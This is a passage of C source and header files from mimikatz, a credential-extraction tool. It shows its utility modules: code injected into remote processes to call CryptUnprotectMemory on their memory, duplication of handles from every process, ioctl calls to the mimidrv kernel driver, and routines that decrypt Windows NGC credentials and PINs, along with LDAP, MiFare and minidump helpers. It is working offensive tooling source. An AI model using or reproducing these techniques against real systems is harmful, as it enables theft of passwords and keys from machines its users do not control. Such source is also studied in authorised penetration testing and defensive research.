41 | BOOL kull_m_asn1_init();
42 | void kull_m_asn1_term();
43 | BOOL kull_m_asn1_DotVal2Eoid(__in const ASN1char_t *dotOID, __out OssEncodedOID *encodedOID);
44 | void kull_m_asn1_freeEnc(void *pBuf);
45 | BOOL kull_m_asn1_Eoid2DotVal(__in const OssEncodedOID *encodedOID, __out ASN1char_t **dotOID);
46 | void kull_m_asn1_freeDec(void *pBuf);
--------------------------------------------------------------------------------
/modules/kull_m_cabinet.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include <strsafe.h>
9 | #include <fci.h>
10 |
11 | LPCSTR FCIErrorToString(FCIERROR err);
12 |
13 | typedef struct _KIWI_CABINET{
14 | HFCI hfci;
15 | CCAB ccab;
16 | ERF erf;
17 | } KIWI_CABINET, *PKIWI_CABINET;
18 |
19 | PKIWI_CABINET kull_m_cabinet_create(LPSTR cabinetName);
20 | BOOL kull_m_cabinet_add(PKIWI_CABINET cab, LPSTR sourceFile, OPTIONAL LPSTR destFile);
21 | BOOL kull_m_cabinet_close(PKIWI_CABINET cab);
22 |
--------------------------------------------------------------------------------
/modules/kull_m_crypto_ngc.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include "kull_m_crypto.h"
9 | #include "kull_m_crypto_sk.h"
10 |
11 | typedef struct _KIWI_POPKEY {
12 | DWORD version;
13 | DWORD type; // 1 soft, 2 hard
14 | BYTE key[ANYSIZE_ARRAY];
15 | } KIWI_POPKEY, *PKIWI_POPKEY;
16 |
17 | typedef struct _KIWI_POPKEY_HARD {
18 | DWORD version;
19 | DWORD cbName;
20 | DWORD cbKey;
21 | BYTE data[ANYSIZE_ARRAY];
22 | } KIWI_POPKEY_HARD, *PKIWI_POPKEY_HARD;
23 |
24 | typedef struct _KIWI_NGC_CREDENTIAL {
25 | DWORD dwVersion;
26 | DWORD cbEncryptedKey;
27 | DWORD cbIV;
28 | DWORD cbEncryptedPassword;
29 | DWORD cbUnk;
30 | BYTE Data[ANYSIZE_ARRAY];
31 | // ...
32 | } KIWI_NGC_CREDENTIAL, *PKIWI_NGC_CREDENTIAL;
33 |
34 | typedef struct _UNK_PIN {
35 | DWORD cbData;
36 | DWORD unk0;
37 | PWSTR pData;
38 | } UNK_PIN, *PUNK_PIN;
39 |
40 | typedef struct _UNK_PADDING {
41 | DWORD unk0;
42 | DWORD unk1;
43 | PUNK_PIN pin;
44 | } UNK_PADDING, *PUNK_PADDING;
45 |
46 | typedef SECURITY_STATUS (WINAPI * PNCRYPTKEYDERIVATION) (NCRYPT_KEY_HANDLE hKey, NCryptBufferDesc *pParameterList, PUCHAR pbDerivedKey, DWORD cbDerivedKey, DWORD *pcbResult, ULONG dwFlags); // tofix
47 | typedef NTSTATUS (WINAPI * PNGCSIGNWITHSYMMETRICPOPKEY) (PBYTE pbKey, DWORD cbKey, PBYTE pbLabel, DWORD cbLabel, PBYTE pbContext, DWORD cbContext, PBYTE pbData, DWORD cbData, PBYTE *ppbOutput, PDWORD pcbOutput); // tofix
48 |
49 | BOOL kull_m_crypto_ngc_keyvalue_derived_software(PBYTE pbLabel, DWORD cbLabel, PBYTE pbContext, DWORD cbContext, LPCBYTE Key, DWORD cbKey, PBYTE DerivedKey, DWORD cbDerivedKey);
50 | BOOL kull_m_crypto_ngc_keyvalue_derived_hardware(PBYTE pbLabel, DWORD cbLabel, PBYTE pbContext, DWORD cbContext, LPCWSTR TransportKeyName, LPCBYTE Key, DWORD cbKey, PBYTE DerivedKey, DWORD cbDerivedKey);
51 | BOOL kull_m_crypto_ngc_signature_derived(LPCBYTE pcbKey, DWORD cbKey, LPCBYTE pcbData, DWORD cbData, LPBYTE pbHash, DWORD cbHash);
52 | BOOL kull_m_crypto_ngc_signature_pop(PBYTE pbKey, DWORD cbKey, PBYTE pbLabel, DWORD cbLabel, PBYTE pbContext, DWORD cbContext, PBYTE pbData, DWORD cbData, PBYTE *ppbOutput, PDWORD pcbOutput);
53 |
54 | PBYTE kull_m_crypto_ngc_pin_BinaryPinToPinProperty(LPCBYTE pbBinary, DWORD cbBinary, DWORD *pcbResult);
55 | SECURITY_STATUS kull_m_crypto_ngc_hardware_unseal(NCRYPT_PROV_HANDLE hProv, LPCBYTE pbPin, DWORD cbPin, LPCBYTE pbInput, DWORD cbInput, PBYTE *ppOutput, DWORD *pcbOutput);
56 | SECURITY_STATUS kull_m_crypto_ngc_software_decrypt(NCRYPT_PROV_HANDLE hProv, LPCWSTR szKeyName, LPCBYTE pbPin, DWORD cbPin, LPCBYTE pbInput, DWORD cbInput, PBYTE *ppOutput, DWORD *pcbOutput);
--------------------------------------------------------------------------------
/modules/kull_m_crypto_remote.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "kull_m_crypto_remote.h"
7 |
8 | #pragma optimize("", off)
9 | DWORD WINAPI kull_m_crypto_remote_thread_CryptProtectMemory_Generic(PREMOTE_LIB_DATA lpParameter) // to Protect & Unprotect
10 | {
11 | lpParameter->output.outputData = lpParameter->input.inputData;
12 | lpParameter->output.outputSize = lpParameter->input.inputSize;
13 | lpParameter->output.outputStatus = ((PCRYPTUNPROTECTMEMORY) 0x4141414141414141)(lpParameter->input.inputData, lpParameter->input.inputSize, lpParameter->input.inputDword);
14 |
15 | return STATUS_SUCCESS;
16 | }
17 | DWORD kull_m_crypto_remote_thread_CryptProtectMemory_Generic_end(){return 'kipr';}
18 | #pragma optimize("", on)
19 |
20 | BOOL WINAPI kull_m_crypto_remote_CryptProtectMemory_Generic(__in PKULL_M_MEMORY_HANDLE hProcess, __in BOOL bIsProtect, __inout LPVOID pDataIn, __in DWORD cbDataIn, __in DWORD dwFlags)
21 | {
22 | BOOL status = FALSE;
23 | PREMOTE_LIB_INPUT_DATA iData;
24 | REMOTE_LIB_OUTPUT_DATA oData;
25 |
26 | REMOTE_EXT extensions[] = {
27 | {L"dpapi.dll", "CryptProtectMemory", (PVOID) 0x4141414141414141, NULL},
28 | {L"dpapi.dll", "CryptUnprotectMemory", (PVOID) 0x4141414141414141, NULL},
29 | };
30 | MULTIPLE_REMOTE_EXT extForCb = {1, bIsProtect ? &extensions[0] : &extensions[1]};
31 | KULL_M_MEMORY_ADDRESS aRemoteFunc;
32 |
33 | if(kull_m_remotelib_CreateRemoteCodeWitthPatternReplace(hProcess, kull_m_crypto_remote_thread_CryptProtectMemory_Generic, (DWORD) ((PBYTE) kull_m_crypto_remote_thread_CryptProtectMemory_Generic_end - (PBYTE) kull_m_crypto_remote_thread_CryptProtectMemory_Generic), &extForCb, &aRemoteFunc))
34 | {
35 | if(iData = kull_m_remotelib_CreateInput(NULL, dwFlags, cbDataIn, pDataIn))
36 | {
37 | if(kull_m_remotelib_create(&aRemoteFunc, iData, &oData))
38 | {
39 | status = (BOOL) oData.outputStatus;
40 |
41 | if(status)
42 | {
43 | RtlCopyMemory(pDataIn, oData.outputData, min(cbDataIn, oData.outputSize));
44 | }
45 | // LocalFree oData.outputData ?
46 | }
47 | LocalFree(iData);
48 | }
49 | kull_m_memory_free(&aRemoteFunc);
50 | }
51 | else PRINT_ERROR(L"kull_m_remotelib_CreateRemoteCodeWitthPatternReplace\n");
52 |
53 | return status;
54 | }
--------------------------------------------------------------------------------
/modules/kull_m_crypto_remote.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include "kull_m_remotelib.h"
9 |
10 | //typedef BOOL (WINAPI * PCRYPTPROTECTMEMORY) (__inout LPVOID pDataIn, __in DWORD cbDataIn, __in DWORD dwFlags);
11 | typedef BOOL (WINAPI * PCRYPTUNPROTECTMEMORY) (__inout LPVOID pDataIn, __in DWORD cbDataIn, __in DWORD dwFlags);
12 |
13 | BOOL WINAPI kull_m_crypto_remote_CryptProtectMemory_Generic(__in PKULL_M_MEMORY_HANDLE hProcess, __in BOOL bIsProtect, __inout LPVOID pDataIn, __in DWORD cbDataIn, __in DWORD dwFlags);
14 |
15 | #define kull_m_crypto_remote_CryptProtectMemory(hProcess, pDataIn, cbDataIn, dwFlags) kull_m_crypto_remote_CryptProtectMemory_Generic(hProcess, TRUE, pDataIn, cbDataIn, dwFlags)
16 | #define kull_m_crypto_remote_CryptUnprotectMemory(hProcess, pDataIn, cbDataIn, dwFlags) kull_m_crypto_remote_CryptProtectMemory_Generic(hProcess, FALSE, pDataIn, cbDataIn, dwFlags)
--------------------------------------------------------------------------------
/modules/kull_m_crypto_sk.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include "kull_m_string.h"
9 |
10 | #if !defined(BCRYPT_SP800108_CTR_HMAC_ALGORITHM)
11 | #define BCRYPT_SP800108_CTR_HMAC_ALGORITHM L"SP800_108_CTR_HMAC"
12 | #define KDF_LABEL 0xD
13 | #define KDF_CONTEXT 0xE
14 | #define KDF_SALT 0xF
15 | #define KDF_ITERATION_COUNT 0x10
16 |
17 | extern NTSTATUS WINAPI BCryptKeyDerivation(IN BCRYPT_KEY_HANDLE hKey, IN OPTIONAL BCryptBufferDesc *pParameterList, OUT PUCHAR pbDerivedKey, IN ULONG cbDerivedKey, OUT ULONG *pcbResult, IN ULONG dwFlags);
18 | #endif
19 |
20 | #define IUMDATAPROTECT "IUMDATAPROTECT"
21 | typedef NTSTATUS (WINAPI * PBCRYPT_ENCRYPT) (__inout BCRYPT_KEY_HANDLE hKey, __in_bcount_opt(cbInput) PUCHAR pbInput, __in ULONG cbInput, __in_opt VOID *pPaddingInfo, __inout_bcount_opt(cbIV) PUCHAR pbIV, __in ULONG cbIV, __out_bcount_part_opt(cbOutput, *pcbResult) PUCHAR pbOutput, __in ULONG cbOutput, __out ULONG *pcbResult, __in ULONG dwFlags);
22 |
23 | NTSTATUS SkpOpenAesGcmProvider(BCRYPT_ALG_HANDLE *phAlgAESGCM, DWORD *pObjectLengthAesGcm);
24 | NTSTATUS SkpOpenKdfProvider(BCRYPT_ALG_HANDLE *phAlgSP800108, DWORD *pObjectLengthSP800108);
25 | NTSTATUS SkpImportMasterKeyInKdf(PBYTE BootKey, DWORD cbBootKey, BCRYPT_ALG_HANDLE hAlgSP800108, DWORD ObjectLengthSP800108, BCRYPT_KEY_HANDLE *phKeySP800108, UCHAR *pbKeyObject);
26 | NTSTATUS SkpInitSymmetricEncryption(PBYTE BootKey, DWORD cbBootKey, BCRYPT_ALG_HANDLE *phAlgAESGCM, DWORD *pObjectLengthAesGcm, BCRYPT_ALG_HANDLE *phAlgSP800108, DWORD *pObjectLengthSP800108, BCRYPT_KEY_HANDLE *phKeySP800108, PUCHAR *pbKeyObject);
27 | NTSTATUS SkpDeriveSymmetricKey(BCRYPT_KEY_HANDLE hKey, CHAR *cLabel, ULONG cbLabel, PBYTE pContext, ULONG cbContext, PUCHAR pbDerivedKey, ULONG cbDerivedKey);
28 | NTSTATUS SkpEncryptionWorker(PBYTE BootKey, DWORD cbBootKey, UCHAR *pbInput, ULONG cbInput, UCHAR *pbAuthData, ULONG cbAuthData, UCHAR *pKdfContext, ULONG cbKdfContext, UCHAR *pbTag, ULONG cbTag, UCHAR *pbOutput, ULONG cbOutput, BOOL Encrypt);
--------------------------------------------------------------------------------
/modules/kull_m_file.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include <shlwapi.h>
9 | #include "kull_m_string.h"
10 |
11 | BOOL isBase64InterceptOutput, isBase64InterceptInput;
12 |
13 | typedef BOOL (CALLBACK * PKULL_M_FILE_FIND_CALLBACK) (DWORD level, PCWCHAR fullpath, PCWCHAR path, PVOID pvArg);
14 |
15 | BOOL kull_m_file_getCurrentDirectory(wchar_t ** ppDirName);
16 | BOOL kull_m_file_getAbsolutePathOf(PCWCHAR thisData, wchar_t ** reponse);
17 | BOOL kull_m_file_isFileExist(PCWCHAR fileName);
18 | BOOL kull_m_file_writeData(PCWCHAR fileName, LPCVOID data, DWORD lenght);
19 | BOOL kull_m_file_readData(PCWCHAR fileName, PBYTE * data, PDWORD lenght); // for 'little' files !
20 | BOOL kull_m_file_readGeneric(PCWCHAR fileName, PBYTE * data, PDWORD lenght, DWORD flags);
21 | void kull_m_file_cleanFilename(PWCHAR fileName);
22 | PWCHAR kull_m_file_fullPath(PCWCHAR fileName);
23 | BOOL kull_m_file_Find(PCWCHAR directory, PCWCHAR filter, BOOL isRecursive /*TODO*/, DWORD level, BOOL isPrintInfos, BOOL isWithDir, PKULL_M_FILE_FIND_CALLBACK callback, PVOID pvArg);
--------------------------------------------------------------------------------
/modules/kull_m_handle.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "kull_m_handle.h"
7 |
8 | NTSTATUS kull_m_handle_getHandles(PKULL_M_SYSTEM_HANDLE_ENUM_CALLBACK callBack, PVOID pvArg)
9 | {
10 | NTSTATUS status;
11 | ULONG i;
12 | PSYSTEM_HANDLE_INFORMATION buffer = NULL;
13 |
14 | status = kull_m_process_NtQuerySystemInformation(SystemHandleInformation, &buffer, 0);
15 | if(NT_SUCCESS(status))
16 | {
17 | for(i = 0; (i < buffer->HandleCount) && callBack(&buffer->Handles[i], pvArg); i++);
18 | LocalFree(buffer);
19 | }
20 | return status;
21 | }
22 |
23 | NTSTATUS kull_m_handle_getHandlesOfType(PKULL_M_HANDLE_ENUM_CALLBACK callBack, LPCTSTR type, DWORD dwDesiredAccess, DWORD dwOptions, PVOID pvArg)
24 | {
25 | UNICODE_STRING uStr;
26 | HANDLE_ENUM_DATA data = {NULL, dwDesiredAccess, dwOptions, callBack, pvArg};
27 | if(type)
28 | {
29 | RtlInitUnicodeString(&uStr, type);
30 | data.type = &uStr;
31 | }
32 | return kull_m_handle_getHandles(kull_m_handle_getHandlesOfType_callback, &data);
33 | }
34 |
35 | BOOL CALLBACK kull_m_handle_getHandlesOfType_callback(PSYSTEM_HANDLE pSystemHandle, PVOID pvArg)
36 | {
37 | PHANDLE_ENUM_DATA pData = (PHANDLE_ENUM_DATA) pvArg;
38 | BOOL status = TRUE;
39 | HANDLE hProcess, hRemoteHandle;
40 | POBJECT_TYPE_INFORMATION pInfos;
41 | ULONG szNeeded;
42 |
43 | if(hProcess = OpenProcess(PROCESS_DUP_HANDLE, FALSE, pSystemHandle->ProcessId))
44 | {
45 | if(DuplicateHandle(hProcess, (HANDLE) pSystemHandle->Handle, GetCurrentProcess(), &hRemoteHandle, pData->dwDesiredAccess, TRUE, pData->dwOptions))
46 | {
47 | if(NtQueryObject(hRemoteHandle, ObjectTypeInformation, NULL, 0, &szNeeded) == STATUS_INFO_LENGTH_MISMATCH)
48 | {
49 | if(pInfos = (POBJECT_TYPE_INFORMATION) LocalAlloc(LPTR, szNeeded))
50 | {
51 | if(NT_SUCCESS(NtQueryObject(hRemoteHandle, ObjectTypeInformation, pInfos, szNeeded, &szNeeded)))
52 | {
53 | if(!pData->type || RtlEqualUnicodeString(&pInfos->TypeName, pData->type, TRUE))
54 | status = pData->callBack(hRemoteHandle, pSystemHandle, pData->pvArg);
55 | }
56 | LocalFree(pInfos);
57 | }
58 | }
59 | CloseHandle(hRemoteHandle);
60 | }
61 | CloseHandle(hProcess);
62 | }
63 | return status;
64 | }
65 |
66 | BOOL kull_m_handle_GetUserObjectInformation(HANDLE hObj, int nIndex, PVOID *pvInfo, PDWORD nLength)
67 | {
68 | BOOL status = FALSE;
69 | DWORD szNeeded;
70 |
71 | if(!GetUserObjectInformation(hObj, nIndex, NULL, 0, &szNeeded) && (GetLastError() == ERROR_INSUFFICIENT_BUFFER) && szNeeded)
72 | {
73 | if(*pvInfo = LocalAlloc(LPTR, szNeeded))
74 | {
75 | if(nLength)
76 | *nLength = szNeeded;
77 | if(!(status = GetUserObjectInformation(hObj, nIndex, *pvInfo, szNeeded, &szNeeded)))
78 | LocalFree(*pvInfo);
79 | }
80 | }
81 | return status;
82 | }
--------------------------------------------------------------------------------
/modules/kull_m_hid.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "kull_m_hid.h"
--------------------------------------------------------------------------------
/modules/kull_m_kernel.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "kull_m_kernel.h"
7 |
8 | BOOL kull_m_kernel_ioctl_handle(HANDLE hDriver, DWORD ioctlCode, PVOID bufferIn, DWORD szBufferIn, PVOID * pBufferOut, PDWORD pSzBufferOut, BOOL autobuffer)
9 | {
10 | BOOL status = FALSE;
11 | DWORD lStatus = ERROR_MORE_DATA, returned;
12 |
13 | if(!autobuffer)
14 | {
15 | status = DeviceIoControl(hDriver, ioctlCode, bufferIn, szBufferIn, pBufferOut ? *pBufferOut : NULL, pSzBufferOut ? *pSzBufferOut : 0, &returned, NULL);
16 | }
17 | else
18 | {
19 | for(*pSzBufferOut = 0x10000; (lStatus == ERROR_MORE_DATA) && (*pBufferOut = LocalAlloc(LPTR, *pSzBufferOut)) ; *pSzBufferOut <<= 1)
20 | {
21 | if(status = DeviceIoControl(hDriver, ioctlCode, bufferIn, szBufferIn, *pBufferOut, *pSzBufferOut, &returned, NULL))
22 | {
23 | lStatus = ERROR_SUCCESS;
24 | }
25 | else
26 | {
27 | lStatus = GetLastError();
28 | if(lStatus == ERROR_MORE_DATA)
29 | LocalFree(*pBufferOut);
30 | }
31 | }
32 | }
33 | if(!status)
34 | {
35 | PRINT_ERROR(L"DeviceIoControl (0x%08x) : 0x%08x\n", ioctlCode, GetLastError());
36 | if(autobuffer)
37 | LocalFree(*pBufferOut);
38 | }
39 | else if(pSzBufferOut)
40 | *pSzBufferOut = returned;
41 | return status;
42 | }
43 |
44 | BOOL kull_m_kernel_ioctl(PCWSTR driver, DWORD ioctlCode, PVOID bufferIn, DWORD szBufferIn, PVOID * pBufferOut, PDWORD pSzBufferOut, BOOL autobuffer)
45 | {
46 | BOOL status = FALSE;
47 | HANDLE hDriver;
48 | hDriver = CreateFile(driver, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
49 | if(hDriver && hDriver != INVALID_HANDLE_VALUE)
50 | {
51 | status = kull_m_kernel_ioctl_handle(hDriver, ioctlCode, bufferIn, szBufferIn, pBufferOut, pSzBufferOut, autobuffer);
52 | CloseHandle(hDriver);
53 | }
54 | else
55 | PRINT_ERROR_AUTO(L"CreateFile");
56 | return status;
57 | }
58 |
59 | BOOL kull_m_kernel_mimidrv_ioctl(DWORD ioctlCode, PVOID bufferIn, DWORD szBufferIn, PVOID * pBufferOut, PDWORD pSzBufferOut, BOOL autobuffer)
60 | {
61 | return kull_m_kernel_ioctl(L"\\\\.\\" MIMIKATZ_DRIVER, ioctlCode, bufferIn, szBufferIn, pBufferOut, pSzBufferOut, autobuffer);
62 | }
63 |
64 | BOOL kull_m_kernel_mimidrv_simple_output(DWORD ioctlCode, PVOID bufferIn, DWORD szBufferIn)
65 | {
66 | BOOL status = FALSE;
67 | PVOID buffer = NULL;
68 | DWORD i, szBuffer;
69 |
70 | if(status = kull_m_kernel_ioctl(L"\\\\.\\" MIMIKATZ_DRIVER, ioctlCode, bufferIn, szBufferIn, &buffer, &szBuffer, TRUE))
71 | {
72 | for(i = 0; i < szBuffer / sizeof(wchar_t); i++)
73 | kprintf(L"%c", ((wchar_t *) buffer)[i]);
74 | LocalFree(buffer);
75 | }
76 | return status;
77 | }
--------------------------------------------------------------------------------
/modules/kull_m_kernel.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include <winioctl.h>
9 | #include "../mimidrv/ioctl.h"
10 |
11 | BOOL kull_m_kernel_ioctl_handle(HANDLE hDriver, DWORD ioctlCode, PVOID bufferIn, DWORD szBufferIn, PVOID * pBufferOut, PDWORD pSzBufferOut, BOOL autobuffer);
12 | BOOL kull_m_kernel_ioctl(PCWSTR driver, DWORD ioctlCode, PVOID bufferIn, DWORD szBufferIn, PVOID * pBufferOut, PDWORD pSzBufferOut, BOOL autobuffer);
13 | BOOL kull_m_kernel_mimidrv_ioctl(DWORD ioctlCode, PVOID bufferIn, DWORD szBufferIn, PVOID * pBufferOut, PDWORD pSzBufferOut, BOOL autobuffer);
14 | BOOL kull_m_kernel_mimidrv_simple_output(DWORD ioctlCode, PVOID bufferIn, DWORD szBufferIn);
--------------------------------------------------------------------------------
/modules/kull_m_ldap.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "kull_m_ldap.h"
7 |
8 | BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR *rootDn, PSEC_WINNT_AUTH_IDENTITY pIdentity)
9 | {
10 | BOOL status = FALSE;
11 | DWORD dwErr;
12 |
13 | if(*ld = ldap_init((PWCHAR) system, LDAP_PORT))
14 | {
15 | if(*rootDn = kull_m_ldap_getRootDomainNamingContext(nc, *ld))
16 | {
17 | dwErr = ldap_bind_s(*ld, NULL, (PWCHAR) pIdentity, LDAP_AUTH_NEGOTIATE);
18 | status = (dwErr == LDAP_SUCCESS);
19 | if(!status)
20 | {
21 | PRINT_ERROR(L"ldap_bind_s 0x%x (%u)\n", dwErr, dwErr);
22 | *rootDn = (PWCHAR) LocalFree(*rootDn);
23 | }
24 | }
25 | if(!status)
26 | ldap_unbind(*ld);
27 | }
28 | else PRINT_ERROR(L"ldap_init\n");
29 | return status;
30 | }
31 |
32 | PWCHAR kull_m_ldap_getRootDomainNamingContext(PCWCHAR nc, LDAP *ld)
33 | {
34 | DWORD dwErr;
35 | PWCHAR rootAttr[] = {nc ? (PWCHAR) nc : L"rootDomainNamingContext", NULL}, ret = NULL;
36 | PLDAPMessage pMessage = NULL;
37 | PBERVAL *pBerVal;
38 |
39 | dwErr = ldap_search_s(ld, NULL, LDAP_SCOPE_BASE, L"(dn=RootDSE)", rootAttr, FALSE, &pMessage);
40 | if(dwErr == LDAP_SUCCESS)
41 | {
42 | if(ldap_count_entries(ld, pMessage) == 1)
43 | {
44 | if(pBerVal = ldap_get_values_len(ld, pMessage, rootAttr[0]))
45 | {
46 | if(ldap_count_values_len(pBerVal) == 1)
47 | ret = kull_m_string_qad_ansi_c_to_unicode(pBerVal[0]->bv_val, pBerVal[0]->bv_len);
48 | else PRINT_ERROR(L"ldap_get_values_len is NOT 1\n");
49 | ldap_value_free_len(pBerVal);
50 | }
51 | }
52 | else PRINT_ERROR(L"ldap_count_entries is NOT 1\n");
53 | }
54 | else PRINT_ERROR(L"ldap_search_s 0x%x (%u)\n", dwErr, dwErr);
55 | if(pMessage)
56 | ldap_msgfree(pMessage);
57 | return ret;
58 | }
--------------------------------------------------------------------------------
/modules/kull_m_ldap.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include <Winldap.h>
9 | #include <WinBer.h>
10 | #include "kull_m_string.h"
11 |
12 | BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR *rootDn, PSEC_WINNT_AUTH_IDENTITY pIdentity);
13 | PWCHAR kull_m_ldap_getRootDomainNamingContext(PCWCHAR nc, LDAP *ld);
--------------------------------------------------------------------------------
/modules/kull_m_mifare.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 |
9 | #define MIFARE_CLASSIC_KEY_SIZE 6
10 | #define MIFARE_CLASSIC_SECTORS 16
11 | #define MIFARE_CLASSIC_BLOCKS_PER_SECTOR 4
12 | #define MIFARE_CLASSIC_BLOCK_SIZE 16
13 | #define MIFARE_CLASSIC_UID_SIZE 4 // ok, I know about 7 or 10 too...
14 |
15 | #define MIFARE_CLASSIC_CMD_REQUEST 0x26 // 7b, ISO/IEC 1443 -> REQA
16 | #define MIFARE_CLASSIC_CMD_WAKEUP 0x52 // 7b, ISO/IEC 1443 -> WUPA
17 | #define MIFARE_CLASSIC_CMD_ANTICOL_CL1 0x93, 0x20
18 | #define MIFARE_CLASSIC_CMD_SELECT_CL1 0x93, 0x70
19 | #define MIFARE_CLASSIC_CMD_ANTICOL_CL2 0x95, 0x20
20 | #define MIFARE_CLASSIC_CMD_SELECT_CL2 0x95, 0x70
21 | #define MIFARE_CLASSIC_CMD_HALT 0x50, 0x00
22 | #define MIFARE_CLASSIC_CMD_AUTH_KEY_A 0x60
23 | #define MIFARE_CLASSIC_CMD_AUTH_KEY_B 0x61
24 | #define MIFARE_CLASSIC_CMD_PERSONALIZE_UID_USAGE 0x40
25 | #define MIFARE_CLASSIC_CMD_SET_MOD_TYPE 0x43
26 | #define MIFARE_CLASSIC_CMD_READ 0x30
27 | #define MIFARE_CLASSIC_CMD_WRITE 0xa0
28 | #define MIFARE_CLASSIC_CMD_DECREMENT 0xc0
29 | #define MIFARE_CLASSIC_CMD_INCREMENT 0xc1
30 | #define MIFARE_CLASSIC_CMD_RESTORE 0xc2
31 | #define MIFARE_CLASSIC_CMD_TRANSFER 0xb0
32 |
33 | #define MIFARE_ULTRALIGHT_WRITE_4B 0xa2
34 |
35 | typedef struct _MIFARE_CLASSIC_ACCESS_BITS {
36 | unsigned not_c1_0: 1;
37 | unsigned not_c1_1: 1;
38 | unsigned not_c1_2: 1;
39 | unsigned not_c1_3: 1;
40 | unsigned not_c2_0: 1;
41 | unsigned not_c2_1: 1;
42 | unsigned not_c2_2: 1;
43 | unsigned not_c2_3: 1;
44 | unsigned not_c3_0: 1;
45 | unsigned not_c3_1: 1;
46 | unsigned not_c3_2: 1;
47 | unsigned not_c3_3: 1;
48 | unsigned c1_0: 1;
49 | unsigned c1_1: 1;
50 | unsigned c1_2: 1;
51 | unsigned c1_3: 1;
52 | unsigned c2_0: 1;
53 | unsigned c2_1: 1;
54 | unsigned c2_2: 1;
55 | unsigned c2_3: 1;
56 | unsigned c3_0: 1;
57 | unsigned c3_1: 1;
58 | unsigned c3_2: 1;
59 | unsigned c3_3: 1;
60 |
61 | unsigned data: 8;
62 | } MIFARE_CLASSIC_ACCESS_BITS, *PMIFARE_CLASSIC_ACCESS_BITS;
63 |
64 |
65 | typedef struct _MIFARE_CLASSIC_RAW_BLOCK {
66 | BYTE data[MIFARE_CLASSIC_BLOCK_SIZE];
67 | } MIFARE_CLASSIC_RAW_BLOCK, *PMIFARE_CLASSIC_RAW_BLOCK;
68 |
69 | typedef struct _MIFARE_CLASSIC_RAW_SECTOR {
70 | MIFARE_CLASSIC_RAW_BLOCK blocks[MIFARE_CLASSIC_BLOCKS_PER_SECTOR];
71 | } MIFARE_CLASSIC_RAW_SECTOR, *PMIFARE_CLASSIC_RAW_SECTOR;
72 |
73 | typedef struct _MIFARE_CLASSIC_RAW_CARD {
74 | MIFARE_CLASSIC_RAW_SECTOR sectors[MIFARE_CLASSIC_SECTORS];
75 | } MIFARE_CLASSIC_RAW_CARD, *PMIFARE_CLASSIC_RAW_CARD;
--------------------------------------------------------------------------------
/modules/kull_m_minidump.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include <dbghelp.h>
9 |
10 | typedef struct _KULL_M_MINIDUMP_HANDLE {
11 | HANDLE hFileMapping;
12 | LPVOID pMapViewOfFile;
13 | } KULL_M_MINIDUMP_HANDLE, *PKULL_M_MINIDUMP_HANDLE;
14 |
15 | BOOL kull_m_minidump_open(IN HANDLE hFile, OUT PKULL_M_MINIDUMP_HANDLE *hMinidump);
